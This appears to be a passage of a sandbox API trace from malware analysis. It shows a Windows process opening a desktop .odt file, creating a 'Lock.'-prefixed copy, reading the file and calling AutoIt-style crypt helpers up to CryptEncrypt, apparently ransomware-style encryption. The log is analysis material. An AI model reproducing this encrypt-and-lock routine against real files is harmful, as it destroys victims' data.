(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0212.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0212.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0212.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0212.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0212.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0212.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0212.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0212.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0212.085] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0212.085] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.085] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.085] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0212.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0212.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0212.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0212.086] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/xTq6MCScdpqJ.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\xtq6mcscdpqj.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0212.086] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.086] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0212.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0212.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0212.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0212.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0212.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0212.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0212.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0212.087] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0212.087] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.xTq6MCScdpqJ.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.xtq6mcscdpqj.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0212.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0212.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0212.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0212.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0212.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0212.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0212.090] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0212.091] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x9c99, lpOverlapped=0x0) returned 1 [0212.157] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0212.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0212.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0212.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0212.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0212.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9c99) returned 0x2f24018 [0212.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0x970000) returned 1 [0212.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0212.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0212.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0212.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0212.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0212.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0212.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9c99) returned 0x2f2dcc0 [0212.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0212.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0212.165] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0212.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0212.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0212.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0212.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9c99) returned 0x2f24018 [0212.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0212.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0212.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0212.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0212.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0212.167] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0212.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0212.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0212.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0212.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0212.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0212.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0212.167] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0212.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0212.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0212.167] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0212.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0212.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0212.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0212.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0212.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0212.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9c99) returned 0x2f24018 [0212.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0212.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0212.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0212.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0212.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0212.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0212.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0212.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0212.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0212.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0212.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0212.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0212.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0212.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0212.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0212.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0212.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0212.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0212.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0212.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9c99) returned 0x2f37968 [0212.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0212.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0212.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0212.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0212.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0212.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0212.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0212.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.173] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0212.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0212.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.174] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0212.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0212.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.174] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.174] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0212.174] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0212.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0212.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.175] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.175] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0212.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.175] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0212.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.175] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0212.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.175] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, 